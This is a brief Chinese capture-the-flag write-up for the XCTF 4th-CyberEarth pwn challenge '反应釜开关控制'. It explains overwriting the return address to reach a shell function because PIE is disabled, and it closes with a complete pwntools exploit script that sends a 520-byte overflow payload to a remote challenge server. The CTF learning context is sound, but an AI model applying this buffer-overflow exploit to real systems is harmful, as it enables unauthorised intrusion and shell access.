反应釜开关控制
题目来源: XCTF 4th-CyberEarth
题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火的制作,所以小M打算通过把反应釜关闭掉来干扰这条TNT生产线的运行,但是反应釜有多个闸门,得想办法帮她把闸门都关掉才行。
虽然按照题目的意思是,每次给你一个地址然后溢出到这个地址,做三次就行,但是不如直接改返回地址到shell,反正没开pie
exp如下
from pwn import * #io = process('./pwn') io = remote('111.200.241.244', 64994) io.recvuntil('>') payload = b'a' * 520 + p64(0x4005F6) io.send(payload) io.interactive()